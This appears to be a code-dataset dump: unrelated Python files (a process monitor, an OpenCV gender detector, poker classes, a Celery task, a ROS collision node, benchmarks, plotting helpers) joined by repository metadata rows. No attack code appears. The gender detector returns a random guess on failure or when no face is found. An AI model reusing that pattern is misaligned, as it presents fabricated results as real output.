def _observe_step(self, call, inputs, outputs, parameters, code):
if code > 0:
return
if self._script:
command = '{0} {1} {2} {3} {4}'.format(self._path_of_call(self._script), call, ' '.join(parameters),
' '.join(inputs), ' '.join(outputs))
else:
command = '{0} {1} {2} {3}'.format(self._path_of_call(call), ' '.join(parameters), ' '.join(inputs),
' '.join(outputs))
print(f'observing {command}')
self._commands.add(command)
def _run_step(self, task_id, host, command, output_paths, log_prefix, async_):
"""
Executes command on host, collects output paths if any, returns exit code
"""
wd = self._prepare_working_dir(task_id)
process = PMonitor._start_processor(command, host, wd)
self._pids[command] = process.pid
self._trace_processor_output(output_paths, process, task_id, command, wd, log_prefix, async_)
process.stdout.close()
code = process.wait()
return code
def _trace_processor_output(self, output_paths, process, task_id, command, wd, log_prefix, async_):
"""
traces processor output, recognises 'output=' lines, writes all lines to trace file in working dir.
for async calls reads external ID from stdout.
"""
if self._cache is None or self._logdir != '.':
trace = open('{0}/{1}-{2:04d}.out'.format(self._logdir, log_prefix, task_id), 'w')
else:
trace = open('{0}/{1}-{2:04d}.out'.format(wd, log_prefix, task_id), 'w')
line = None
if command not in self._processor_logs:
self._processor_logs[command] = []
for l in process.stdout:
line = l.decode()
if line.startswith('output='):
output_paths.append(line[7:].strip())
elif line.startswith('INFO:ScriptProgress'):
script_progress = line.split(':')[-1].split('-')
self._lower_script_progress[command] = int(script_progress[0])
self._upper_script_progress[command] = int(script_progress[1])
self._tasks_progress[command] = int(script_progress[0])
elif line.startswith('INFO:ComponentProgress'):
component_progress = line.split(':')[-1]
if command in self._upper_script_progress and command in self._lower_script_progress:
progress_diff = float(self._upper_script_progress[command] - self._lower_script_progress[command])
relative_progress = int((float(component_progress) * progress_diff) / 100.0)
self._tasks_progress[command] = self._lower_script_progress[command] + relative_progress
else:
self._processor_logs[command].append(line)
trace.write(line)
trace.flush()
trace.close()
if async_ and line:
# assumption that last line contains external ID, with stderr mixed with stdout
output_paths[:] = []
output_paths.append(line.strip())
def get_progress(self, command):
if command in self._tasks_progress:
return self._tasks_progress[command]
return 0
def get_logs(self, command):
if command in self._processor_logs:
return self._processor_logs[command]
return []
def run(self):
code = self.wait_for_completion()
if len(self._cancelled) > 0:
return -1
return code
def cancel(self):
for pid in self._pids:
try:
os.kill(self._pids[pid], signal.SIGTERM)
logging.info(f'Cancelling {pid}')
self._to_be_cancelled.append(pid)
except ProcessLookupError:
# okay, process was outdated
continue
def _write_status(self, with_backlog=False):
self._status.seek(0)
self._status.write('{0} created, {1} running, {2} backlog, {3} processed, {4} failed, {5} cancelled\n'. \
format(self._created, len(self._running), len(self._backlog), self._processed,
len(self._failed), len(self._cancelled)))
for l in self._failed:
self._status.write('f {0}\n'.format(l))
for l in self._cancelled:
self._status.write('c {0}\n'.format(l))
for l in self._running:
if isinstance(self._running[l], PMonitor.Args):
self._status.write('r [{0}] {1}\n'.format(self._running[l].external_id, l))
elif isinstance(self._running[l], str):
self._status.write('r [{0}] {1}\n'.format(self._running[l], l))
else:
self._status.write('r {0}\n'.format(l))
if with_backlog:
for r in self._backlog:
self._status.write('b {0} {1} {2} {3}\n'.format(PMonitor.Args.get_call(r.args),
' '.join(PMonitor.Args.get_parameters(r.args)),
' '.join(PMonitor.Args.get_inputs(r.args)),
' '.join(PMonitor.Args.get_outputs(r.args))))
self._status.truncate()
self._status.flush()
def _finalise_step(self, call, code, command, host, output_paths, outputs, typeOnly=False):
"""
releases host and type resources, updates report, schedules mature steps, handles failure
"""
with self._mutex:
self._release_constraint(call, host, typeOnly=typeOnly)
self._running.pop(command)
if code == 0:
self._report.write(command + '\n')
self._report_and_bind_outputs(outputs, output_paths)
self._report.flush()
self._processed += 1
elif command in self._to_be_cancelled:
self._cancelled.append(command)
sys.__stderr__.write('cancelled {0}\n'.format(command))
else:
self._failed.append(command)
sys.__stderr__.write('failed {0}\n'.format(command))
self._check_for_mature_tasks()
| 45.03125 | 118 | 0.560583 | 7,078 | 0.982373 | 0 | 0 | 0 | 0 | 0 | 0 | 985 | 0.136711 |
3522fc5255a56e1f03bbf963d675fa1aac0e03fb | 2,888 | py | Python | demo/utils/genderdetect.py | TommyZihao/MMGEN-FaceStylor | 05c6539b43fd19955d64eb37c86ee2cd425bcb9d | [
"Apache-2.0"
] | 122 | 2021-12-10T06:19:03.000Z | 2022-03-27T12:30:42.000Z | demo/utils/genderdetect.py | pixel-lt/MMGEN-FaceStylor | a72bb3b1ee6cff50e0edd62e5a823049c3c1cd82 | [
"Apache-2.0"
] | 1 | 2021-12-24T10:07:41.000Z | 2021-12-24T10:07:41.000Z | demo/utils/genderdetect.py | pixel-lt/MMGEN-FaceStylor | a72bb3b1ee6cff50e0edd62e5a823049c3c1cd82 | [
"Apache-2.0"
] | 12 | 2021-12-10T10:38:19.000Z | 2022-02-08T12:54:46.000Z | import random
import cv2
padding = 20
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
genderList = ['Male', 'Female']
class GenderDetection():
def __init__(self):
faceProto = 'data/opencv_face_detector.pbtxt'
faceModel = 'data/opencv_face_detector_uint8.pb'
genderProto = 'data/gender_deploy.prototxt'
genderModel = 'data/gender_net.caffemodel'
self.ans = [True, False]
self.faceNet = cv2.dnn.readNet(faceModel, faceProto)
self.genderNet = cv2.dnn.readNet(genderModel, genderProto)
def highlightFace(self, net, frame, conf_threshold=0.9):
frameOpencvDnn = frame.copy()
frameHeight = frameOpencvDnn.shape[0]
frameWidth = frameOpencvDnn.shape[1]
blob = cv2.dnn.blobFromImage(frameOpencvDnn, 1.0, (300, 300),
[104, 117, 123], True, False)
net.setInput(blob)
detections = net.forward()
faceBoxes = []
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > conf_threshold:
x1 = int(detections[0, 0, i, 3] * frameWidth)
y1 = int(detections[0, 0, i, 4] * frameHeight)
x2 = int(detections[0, 0, i, 5] * frameWidth)
y2 = int(detections[0, 0, i, 6] * frameHeight)
faceBoxes.append([x1, y1, x2, y2])
cv2.rectangle(frameOpencvDnn, (x1, y1), (x2, y2), (0, 255, 0),
int(round(frameHeight / 150)), 8)
return frameOpencvDnn, faceBoxes
# opencv
def detect(self, img):
try:
resultImg, faceBoxes = self.highlightFace(self.faceNet, img)
if not faceBoxes:
return self.ans[random.randint(0, 1)]
for faceBox in faceBoxes:
if (max(faceBox) > 1024):
continue
face = img[max(0, faceBox[1] -
padding):min(faceBox[3] +
padding, img.shape[0] - 1),
max(0, faceBox[0] -
padding):min(faceBox[2] +
padding, img.shape[1] - 1)]
blob = cv2.dnn.blobFromImage(face,
1.0, (227, 227),
MODEL_MEAN_VALUES,
swapRB=False)
self.genderNet.setInput(blob)
genderPreds = self.genderNet.forward()
gender = genderList[genderPreds[0].argmax()]
if (gender == 'Female'):
return True
else:
return False
except: # isort:skip # noqa
return self.ans[random.randint(0, 1)]
| 40.111111 | 78 | 0.498269 | 2,747 | 0.951177 | 0 | 0 | 0 | 0 | 0 | 0 | 176 | 0.060942 |
352346172d80e787c3629f02731d55869cb32f15 | 2,223 | py | Python | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | main.py | Knysliux001/pocker | d7f6685db8db407b4f93ea330b9568f1dae39b90 | [
"MIT"
] | null | null | null | # import random
#
# deck = list()
# for suit in ["♦", "♥", "♠", "♣"]:
# for value in ["A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2"]:
# deck.append((value, suit))
# r_sample = random.sample(deck, 7)
# print(r_sample)
from enum import Enum, auto, unique
class Suit(Enum):
HEARTS = "♥"
DIAMONDS = "♦"
CLUBS = "♣"
SPADES = "♠"
class CardRank(Enum):
TWO = auto()
THREE = auto()
FOUR = auto()
FIVE = auto()
SIX = auto()
SEVEN = auto()
EIGHT = auto()
NINE = auto()
TEN = auto()
JACK = auto()
QUEEN = auto()
KING = auto()
AXE = auto()
class HandRank(Enum):
HIGHEST_CARD = auto()
PAIR = auto()
TWO_PAIRS = auto()
THREE = auto()
STRAIGHT = auto()
FLUSH = auto()
FULL_HOUSE = auto()
FOUR = auto()
STRAIGHT_FLUSH = auto()
ROYAL_FLUSH = auto()
class Card():
def __init__(self, value, suit):
self.__value = value
self.__suit = suit
def getValue(self):
return self.__value
def __str__(self):
pass
def __eq__(self, card2):
return self.__value.value == card2.getValue().value
def __lt__(self, card2):
return self.__value.value < card2.getValue().value
class Player(Card):
def __init__(self, name):
self.__name = name
self.__hand = []
def getName(self):
return self.__name
def receiveCard(self, new_card):
if isinstance(new_card, Card):
self.__hand.append(new_card)
def showHand(self):
hand_str = []
for card in self.__hand:
hand_str.append(card)
print(hand_str)
card1 = Card(CardRank.FIVE, Suit.SPADES)
card2 = Card(CardRank.SEVEN, Suit.CLUBS)
card3 = Card(CardRank.AXE, Suit.CLUBS)
card4 = Card(CardRank.FIVE, Suit.SPADES)
card5 = Card(CardRank.SEVEN, Suit.CLUBS)
card6 = Card(CardRank.AXE, Suit.CLUBS)
card7 = Card(CardRank.AXE, Suit.CLUBS)
l = [card1, card2, card3, card4, card5, card6, card7]
print(l)
print(card1 < card3)
| 21.375 | 87 | 0.525416 | 1,511 | 0.674855 | 0 | 0 | 0 | 0 | 0 | 0 | 276 | 0.123269 |
352358117b3813753b8bc8e524aa0139c98a9916 | 1,118 | py | Python | networkapi/api_task/classes.py | vinicius-marinho/GloboNetworkAPI | 94651d3b4dd180769bc40ec966814f3427ccfb5b | [
"Apache-2.0"
] | 73 | 2015-04-13T17:56:11.000Z | 2022-03-24T06:13:07.000Z | networkapi/api_task/classes.py | leopoldomauricio/GloboNetworkAPI | 3b5b2e336d9eb53b2c113977bfe466b23a50aa29 | [
"Apache-2.0"
] | 99 | 2015-04-03T01:04:46.000Z | 2021-10-03T23:24:48.000Z | networkapi/api_task/classes.py | shildenbrand/GloboNetworkAPI | 515d5e961456cee657c08c275faa1b69b7452719 | [
"Apache-2.0"
] | 64 | 2015-08-05T21:26:29.000Z | 2022-03-22T01:06:28.000Z | # -*- coding: utf-8 -*-
from networkapi import celery_app
from networkapi.queue_tools.rabbitmq import QueueManager
from networkapi.usuario.models import Usuario
class BaseTask(celery_app.Task):
def after_return(self, status, retval, task_id, args, kwargs, einfo):
user = Usuario.get_by_pk(args[1])
task = celery_app.AsyncResult(task_id)
if status == 'FAILURE':
if hasattr(task.result, "exc_message"):
result = task.result.exc_message
else:
result = task.result.message
else:
result = task.result
queue_name = 'tasks.%s' % user.user.lower()
routing_key = '%s.%s' % (queue_name, task_id)
queue_manager = QueueManager(broker_vhost='tasks',
queue_name=queue_name,
exchange_name=queue_name,
routing_key=routing_key)
queue_manager.append({
'task_id': task_id,
'status': status,
'result': result
})
queue_manager.send()
| 32.882353 | 73 | 0.560823 | 954 | 0.853309 | 0 | 0 | 0 | 0 | 0 | 0 | 94 | 0.084079 |
35238db428c720694c3ee3ace0a023636d8019be | 539 | py | Python | tests/thalesians/filtering/algs/test_kalman.py | thalesians/bayestsa | d54ea04ffa9903473b11c906545e95b2666afb88 | [
"Apache-2.0"
] | 18 | 2017-03-07T19:13:18.000Z | 2021-01-05T00:35:30.000Z | tests/thalesians/filtering/algs/test_kalman.py | HanMeh/bayestsa | d54ea04ffa9903473b11c906545e95b2666afb88 | [
"Apache-2.0"
] | null | null | null | tests/thalesians/filtering/algs/test_kalman.py | HanMeh/bayestsa | d54ea04ffa9903473b11c906545e95b2666afb88 | [
"Apache-2.0"
] | 14 | 2016-12-27T00:09:40.000Z | 2020-12-27T19:23:53.000Z | import datetime
import unittest
class KalmanFilterTest(unittest.TestCase):
def test_kalman_filter_with_prior_predict(self):
t0 = datetime.datetime(2014, 2, 12, 16, 18, 25, 204000)
print(t0)
self.assertEqual(1., 1.)
def test_kalman_filter_without_prior_predict(self):
pass
def test_kalman_filter_with_low_variance_observation(self):
pass
def test_kalman_filter_multidim(self):
pass
if __name__ == '__main__':
unittest.main()
| 23.434783 | 63 | 0.64564 | 445 | 0.825603 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.018553 |
352401392d56cb0110d7577485af9d192f7adefa | 615 | py | Python | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 2,276 | 2020-04-07T17:38:30.000Z | 2022-03-30T12:24:55.000Z | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 31 | 2020-04-10T21:25:18.000Z | 2022-02-10T01:17:19.000Z | fclib/tests/test_dcnn.py | barrosm/forecasting | 86b421b71826b92e47c3e3cb6cdcbf7ff4a63b90 | [
"MIT"
] | 401 | 2020-04-07T18:52:22.000Z | 2022-03-29T04:26:29.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from fclib.models.dilated_cnn import create_dcnn_model
def test_create_dcnn_model():
mod0 = create_dcnn_model(seq_len=1) # default args
assert mod0 is not None
mod1 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=1, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod1 is not None
mod2 = create_dcnn_model(
seq_len=1, n_dyn_fea=1, n_outputs=2, n_dilated_layers=2, kernel_size=2, dropout_rate=0.05, max_cat_id=[30, 120]
)
assert mod2 is not None
| 30.75 | 119 | 0.720325 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 85 | 0.138211 |
352587a10e761446a3e63b0953410077faf0a841 | 1,579 | py | Python | threads/thread_pool_example.py | CoolerVoid/Python_survival_tricks | 10cfa91535b46e3e2bcad32128067c2239fcb13a | [
"BSD-2-Clause"
] | 4 | 2019-08-02T12:21:42.000Z | 2022-03-18T01:59:51.000Z | threads/thread_pool_example.py | CoolerVoid/Python_survival_tricks | 10cfa91535b46e3e2bcad32128067c2239fcb13a | [
"BSD-2-Clause"
] | null | null | null | threads/thread_pool_example.py | CoolerVoid/Python_survival_tricks | 10cfa91535b46e3e2bcad32128067c2239fcb13a | [
"BSD-2-Clause"
] | null | null | null | # threadpool example
import sys
from threading import Thread
import queue
import time
class Worker(Thread):
def __init__(self,queue):
super(Worker, self).__init__()
self._q = queue
self.daemon = True
self.start()
def run(self):
while True:
f,args,kwargs = self._q.get()
try:
if f(*args, **kwargs)!=None:
f(*args, **kwargs)
except Exception as e:
print(e.message)
self._q.task_done()
class ThreadPool(object):
def __init__(self, num_t=max):
self._q = queue.Queue(num_t)
# Create Worker Thread
for _ in range(num_t):
Worker(self._q)
def add_task(self,f,*args,**kwargs):
self._q.put((f, args, kwargs))
def wait_complete(self):
self._q.join()
def teste_call(n):
print("Test number : "+str(n))
time.sleep(3)
if __name__ == '__main__':
# threads ao mesmo tempo rodando no caso 3 ao memso tempo
pool = ThreadPool(6)
var=[]
var.append("opa1")
var.append("opa2")
var.append("opa3")
var.append("opa4")
var.append("opa5")
var.append("opa6")
# quantidade de elementos diferentes
counter=6
# 3 seria para rodar 3 vezes
for _ in range(3):
for tmp in var:
# roda 5 threads por vez, cada vez passando um elemento da lista diferente
if counter!=0:
pool.add_task(teste_call,tmp)
counter-=1
if counter == 0:
counter=6
pool.wait_complete()
time.sleep(1)
print("\nLoop range end\n")
| 23.924242 | 84 | 0.582647 | 711 | 0.450285 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.203293 |
35259f2c996dfec7e43f95678e6a70059dbf5d13 | 2,102 | py | Python | src/CollidingNode.py | kingjin94/enhanced_simulation | 45021f9691e5f772ef4840d69b0d504a6ee79441 | [
"Intel"
] | null | null | null | src/CollidingNode.py | kingjin94/enhanced_simulation | 45021f9691e5f772ef4840d69b0d504a6ee79441 | [
"Intel"
] | null | null | null | src/CollidingNode.py | kingjin94/enhanced_simulation | 45021f9691e5f772ef4840d69b0d504a6ee79441 | [
"Intel"
] | null | null | null | #!/usr/bin/python
import rospy
from gazebo_msgs.msg import ContactsState
from enhanced_sim.msg import CollisionState
"""
Spec:
Look at all /panda/bumper* topics, get which are colliding and
publish a boolean variable (per link) saying whether in collision
"""
class CollidingNode(object):
def __init__(self, collision_state_update_freq = 100):
self.update_rate = rospy.Rate(collision_state_update_freq)
self.pub = rospy.Publisher('/panda/bumper/colliding', CollisionState, queue_size=10)
# find all bumper topics and subscribe
self.observedLinks = [] # List of all links under observance
self.last_collision_times = {} # Last collision time for each link
while "/panda/bumper/panda_probe_ball" not in self.observedLinks:
rospy.sleep(1.0)
rospy.loginfo("Waiting for /panda/bumper/panda_probe_ball")
topics = rospy.get_published_topics()
self.observedLinks = [] # List of all links under observance
self.last_collision_times = {} # Last collision time for each link
for name, msgType in topics:
if msgType == "gazebo_msgs/ContactsState" and "/panda/bumper/panda_" in name:
rospy.Subscriber(name, ContactsState,
callback=self.collision_listener, callback_args=name)
self.observedLinks.append(name)
self.last_collision_times[name] = rospy.get_rostime()
def collision_listener(self, msg, link_name):
if any(msg.states): # atleast one valid collision point
if msg.header.stamp > self.last_collision_times[link_name]:
self.last_collision_times[link_name] = msg.header.stamp
def start(self):
while not rospy.is_shutdown():
# Have less than 10 ms passed since last collision?
msg = CollisionState()
msg.colliding = False
for k, v in self.last_collision_times.items():
if rospy.get_rostime() <= rospy.Duration(1, 10000000) + v:
msg.colliding = True
msg.collidingLinks.append(k)
self.pub.publish(msg)
self.update_rate.sleep() # Wait till next update needs to be sent
if __name__ == '__main__':
rospy.init_node("SimpleCollStateGenerator", anonymous=True)
thisNode = CollidingNode()
thisNode.start()
| 38.218182 | 86 | 0.747383 | 1,702 | 0.809705 | 0 | 0 | 0 | 0 | 0 | 0 | 652 | 0.310181 |
352657d69966e9d784fefcae6daaafdd7408b08d | 2,061 | py | Python | flatlib/protocols/behavior.py | UtkuGlsvn/flatlib | 79ecb961ed77393405bc21a11a5874a62103ceef | [
"MIT"
] | null | null | null | flatlib/protocols/behavior.py | UtkuGlsvn/flatlib | 79ecb961ed77393405bc21a11a5874a62103ceef | [
"MIT"
] | null | null | null | flatlib/protocols/behavior.py | UtkuGlsvn/flatlib | 79ecb961ed77393405bc21a11a5874a62103ceef | [
"MIT"
] | null | null | null | """
This file is part of flatlib - (C) FlatAngle
Author: João Ventura (flatangleweb@gmail.com)
This module implements the Behavior Traditional
Protocol.
"""
from flatlib import const
from flatlib import aspects
from flatlib.dignities import essential
def _merge(listA, listB):
""" Merges two list of objects removing
repetitions.
"""
listA = [x.id for x in listA]
listB = [x.id for x in listB]
listA.extend(listB)
set_ = set(listA)
return list(set_)
def compute(chart):
""" Computes the behavior. """
factors = []
# Planets in House1 or Conjunct Asc
house1 = chart.getHouse(const.HOUSE1)
planetsHouse1 = chart.objects.getObjectsInHouse(house1)
asc = chart.getAngle(const.ASC)
planetsConjAsc = chart.objects.getObjectsAspecting(asc, [0])
_set = _merge(planetsHouse1, planetsConjAsc)
factors.append(['Planets in House1 or Conj Asc', _set])
# Planets conjunct Moon or Mercury
moon = chart.get(const.MOON)
mercury = chart.get(const.MERCURY)
planetsConjMoon = chart.objects.getObjectsAspecting(moon, [0])
planetsConjMercury = chart.objects.getObjectsAspecting(mercury, [0])
_set = _merge(planetsConjMoon, planetsConjMercury)
factors.append(['Planets Conj Moon or Mercury', _set])
# Asc ruler if aspected by disposer
ascRulerID = essential.ruler(asc.sign)
ascRuler = chart.getObject(ascRulerID)
disposerID = essential.ruler(ascRuler.sign)
disposer = chart.getObject(disposerID)
_set = []
if aspects.isAspecting(disposer, ascRuler, const.MAJOR_ASPECTS):
_set = [ascRuler.id]
factors.append(['Asc Ruler if aspected by its disposer', _set]);
# Planets aspecting Moon or Mercury
aspMoon = chart.objects.getObjectsAspecting(moon, [60,90,120,180])
aspMercury = chart.objects.getObjectsAspecting(mercury, [60,90,120,180])
_set = _merge(aspMoon, aspMercury)
factors.append(['Planets Asp Moon or Mercury', _set])
return factors | 29.869565 | 76 | 0.681708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 553 | 0.268186 |
35276376126b8d62c338db73e2e88ec964f2ee31 | 147 | py | Python | fetch_embed/__init__.py | ffreemt/fetch-embed | 95b97806d2becd3606989dd270c90453433b8546 | [
"MIT"
] | null | null | null | fetch_embed/__init__.py | ffreemt/fetch-embed | 95b97806d2becd3606989dd270c90453433b8546 | [
"MIT"
] | null | null | null | fetch_embed/__init__.py | ffreemt/fetch-embed | 95b97806d2becd3606989dd270c90453433b8546 | [
"MIT"
] | null | null | null | __version__ = "0.1.6"
from .fetch_embed import fetch_embed
from .embed_text import embed_text
__all__ = (
"fetch_embed",
"embed_text",
)
| 14.7 | 36 | 0.707483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.217687 |
352a8ae5a17ad0bab619623a2f26962525fde757 | 4,570 | py | Python | NeodymiumDotNet.Benchmark.Numpy/SimpleCalculationBenchmark.py | aka-nd1220/NeodymiumDotNet | cbb105af6835f450767383f3ee505e9e5af50bcc | [
"Apache-2.0"
] | null | null | null | NeodymiumDotNet.Benchmark.Numpy/SimpleCalculationBenchmark.py | aka-nd1220/NeodymiumDotNet | cbb105af6835f450767383f3ee505e9e5af50bcc | [
"Apache-2.0"
] | null | null | null | NeodymiumDotNet.Benchmark.Numpy/SimpleCalculationBenchmark.py | aka-nd1220/NeodymiumDotNet | cbb105af6835f450767383f3ee505e9e5af50bcc | [
"Apache-2.0"
] | 1 | 2021-09-06T07:53:25.000Z | 2021-09-06T07:53:25.000Z | #!/usr/bin/env python3
import numpy as np
import numpy.random as npr
import pytest
A1 = npr.rand( 1, 1)
B1 = npr.rand( 1, 1)
C1 = npr.rand( 1, 1)
A3 = npr.rand( 3, 3)
B3 = npr.rand( 3, 3)
C3 = npr.rand( 3, 3)
A10 = npr.rand( 10, 10)
B10 = npr.rand( 10, 10)
C10 = npr.rand( 10, 10)
A30 = npr.rand( 30, 30)
B30 = npr.rand( 30, 30)
C30 = npr.rand( 30, 30)
A100 = npr.rand( 100, 100)
B100 = npr.rand( 100, 100)
C100 = npr.rand( 100, 100)
A300 = npr.rand( 300, 300)
B300 = npr.rand( 300, 300)
C300 = npr.rand( 300, 300)
A1000 = npr.rand(1000, 1000)
B1000 = npr.rand(1000, 1000)
C1000 = npr.rand(1000, 1000)
A3000 = npr.rand(3000, 3000)
B3000 = npr.rand(3000, 3000)
C3000 = npr.rand(3000, 3000)
NC_A1 = list(A1 .flatten())
NC_B1 = list(B1 .flatten())
NC_C1 = list(C1 .flatten())
NC_A3 = list(A3 .flatten())
NC_B3 = list(B3 .flatten())
NC_C3 = list(C3 .flatten())
NC_A10 = list(A10 .flatten())
NC_B10 = list(B10 .flatten())
NC_C10 = list(C10 .flatten())
NC_A30 = list(A30 .flatten())
NC_B30 = list(B30 .flatten())
NC_C30 = list(C30 .flatten())
NC_A100 = list(A100 .flatten())
NC_B100 = list(B100 .flatten())
NC_C100 = list(C100 .flatten())
NC_A300 = list(A300 .flatten())
NC_B300 = list(B300 .flatten())
NC_C300 = list(C300 .flatten())
NC_A1000 = list(A1000.flatten())
NC_B1000 = list(B1000.flatten())
NC_C1000 = list(C1000.flatten())
NC_A3000 = list(A3000.flatten())
NC_B3000 = list(B3000.flatten())
NC_C3000 = list(C3000.flatten())
def add_numpy_core(a: np.ndarray, b: np.ndarray, c: np.ndarray) -> np.ndarray:
return a + b + c
def add_simple_core(a: list, b: list, c: list) -> list:
retval = [0.0] * len(a)
for i in range(len(a)):
retval[i] = a[i] + b[i] + c[i]
return retval
def add_numpy_1 (): return add_numpy_core(A1 , B1 , C1 )
def add_numpy_3 (): return add_numpy_core(A3 , B3 , C3 )
def add_numpy_10 (): return add_numpy_core(A10 , B10 , C10 )
def add_numpy_30 (): return add_numpy_core(A30 , B30 , C30 )
def add_numpy_100 (): return add_numpy_core(A100 , B100 , C100 )
def add_numpy_300 (): return add_numpy_core(A300 , B300 , C300 )
def add_numpy_1000(): return add_numpy_core(A1000, B1000, C1000)
def add_numpy_3000(): return add_numpy_core(A3000, B3000, C3000)
def add_simple_1 (): return add_simple_core(A1 , B1 , C1 )
def add_simple_3 (): return add_simple_core(A3 , B3 , C3 )
def add_simple_10 (): return add_simple_core(A10 , B10 , C10 )
def add_simple_30 (): return add_simple_core(A30 , B30 , C30 )
def add_simple_100 (): return add_simple_core(A100 , B100 , C100 )
def add_simple_300 (): return add_simple_core(A300 , B300 , C300 )
def add_simple_1000(): return add_simple_core(A1000, B1000, C1000)
def add_simple_3000(): return add_simple_core(A3000, B3000, C3000)
def test_add_numpy_1 (benchmark): benchmark.pedantic(add_numpy_1 , rounds=256, iterations=16)
def test_add_numpy_3 (benchmark): benchmark.pedantic(add_numpy_3 , rounds=256, iterations=16)
def test_add_numpy_10 (benchmark): benchmark.pedantic(add_numpy_10 , rounds=256, iterations=16)
def test_add_numpy_30 (benchmark): benchmark.pedantic(add_numpy_30 , rounds=256, iterations=16)
def test_add_numpy_100 (benchmark): benchmark.pedantic(add_numpy_100 , rounds=256, iterations=16)
def test_add_numpy_300 (benchmark): benchmark.pedantic(add_numpy_300 , rounds=256, iterations=16)
def test_add_numpy_1000 (benchmark): benchmark.pedantic(add_numpy_1000 , rounds=256, iterations=16)
def test_add_numpy_3000 (benchmark): benchmark.pedantic(add_numpy_3000 , rounds=256, iterations=16)
def test_add_simple_1 (benchmark): benchmark.pedantic(add_simple_1 , rounds=256, iterations=16)
def test_add_simple_3 (benchmark): benchmark.pedantic(add_simple_3 , rounds=256, iterations=16)
def test_add_simple_10 (benchmark): benchmark.pedantic(add_simple_10 , rounds=256, iterations=16)
def test_add_simple_30 (benchmark): benchmark.pedantic(add_simple_30 , rounds=256, iterations=16)
def test_add_simple_100 (benchmark): benchmark.pedantic(add_simple_100 , rounds=256, iterations=16)
def test_add_simple_300 (benchmark): benchmark.pedantic(add_simple_300 , rounds=256, iterations=16)
def test_add_simple_1000(benchmark): benchmark.pedantic(add_simple_1000, rounds=256, iterations=16)
def test_add_simple_3000(benchmark): benchmark.pedantic(add_simple_3000, rounds=256, iterations=16)
if __name__ == "__main__":
pytest.main(['-v', __file__])
| 42.71028 | 99 | 0.695842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.007877 |
352ab043ccc828a575977f5e6c14834db88b7602 | 51,242 | py | Python | backstaff/plotting.py | lars-frogner/bifrost-rust | ae1b4e7adde92ec1c611259796ef593243f82a8d | [
"Apache-2.0"
] | null | null | null | backstaff/plotting.py | lars-frogner/bifrost-rust | ae1b4e7adde92ec1c611259796ef593243f82a8d | [
"Apache-2.0"
] | 1 | 2019-10-24T07:24:05.000Z | 2019-10-24T07:24:05.000Z | backstaff/plotting.py | lars-frogner/BifRust | ae1b4e7adde92ec1c611259796ef593243f82a8d | [
"Apache-2.0"
] | null | null | null | import copy
import numpy as np
import matplotlib as mpl
# mpl.use('agg')
import matplotlib.pyplot as plt
import matplotlib.patches as mpl_patches
import matplotlib.colors as mpl_colors
import matplotlib.cm as mpl_cm
import matplotlib.animation as animation
import matplotlib.patheffects as path_effects
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d.art3d import Line3DCollection
from mpl_toolkits.axes_grid1 import make_axes_locatable
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from matplotlib.offsetbox import AnchoredText
def create_figure(width=6.0, aspect_ratio=4.0 / 3.0, dpi=300, **kwargs):
return plt.figure(
figsize=kwargs.pop("figsize", (width, width / aspect_ratio)), dpi=dpi, **kwargs
)
def create_2d_subplots(width=6.0, aspect_ratio=4.0 / 3.0, dpi=300, **kwargs):
return plt.subplots(
figsize=kwargs.pop("figsize", (width, width / aspect_ratio)), dpi=dpi, **kwargs
)
def set_2d_plot_extent(ax, x_lims, y_lims):
if x_lims is not None:
ax.set_xlim(*x_lims)
if y_lims is not None:
ax.set_ylim(*y_lims)
def create_3d_plot(width=6.0, aspect_ratio=4.0 / 3.0, dpi=200, **kwargs):
fig = plt.figure(
figsize=kwargs.pop("figsize", (width, width / aspect_ratio)), dpi=dpi, **kwargs
)
ax = fig.add_subplot(111, projection="3d")
return fig, ax
def set_3d_plot_extent(ax, x_lims, y_lims, z_lims, axes_equal=True):
if x_lims is not None:
ax.set_xlim(*x_lims)
if y_lims is not None:
ax.set_ylim(*y_lims)
if z_lims is not None:
ax.set_zlim(*z_lims)
if axes_equal:
set_3d_axes_equal(ax)
def set_3d_axes_equal(ax):
def set_axes_radius(ax, origin, radius):
ax.set_xlim3d([origin[0] - radius, origin[0] + radius])
ax.set_ylim3d([origin[1] - radius, origin[1] + radius])
ax.set_zlim3d([origin[2] - radius, origin[2] + radius])
limits = np.array(
[
ax.get_xlim3d(),
ax.get_ylim3d(),
ax.get_zlim3d(),
]
)
origin = np.mean(limits, axis=1)
radius = 0.5 * np.max(np.abs(limits[:, 1] - limits[:, 0]))
set_axes_radius(ax, origin, radius)
ax.set_box_aspect([2 * radius] * 3)
def set_2d_axis_labels(ax, xlabel, ylabel, xcolor="k", ycolor="k"):
ax.set_xlabel(xlabel, color=xcolor)
ax.set_ylabel(ylabel, color=ycolor)
def set_3d_axis_labels(ax, xlabel, ylabel, zlabel):
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
ax.set_zlabel(zlabel)
def get_default_colors():
return CB_COLOR_CYCLE # plt.rcParams['axes.prop_cycle'].by_key()['color']
class ColorCycle:
def __init__(self, colors=None):
self._colors = get_default_colors() if colors is None else colors
self._color_idx = 0
def get_next(self):
if isinstance(self._colors, list):
color = self._colors[self._color_idx % len(self._colors)]
self._color_idx += 1
else:
color = self._colors
return color
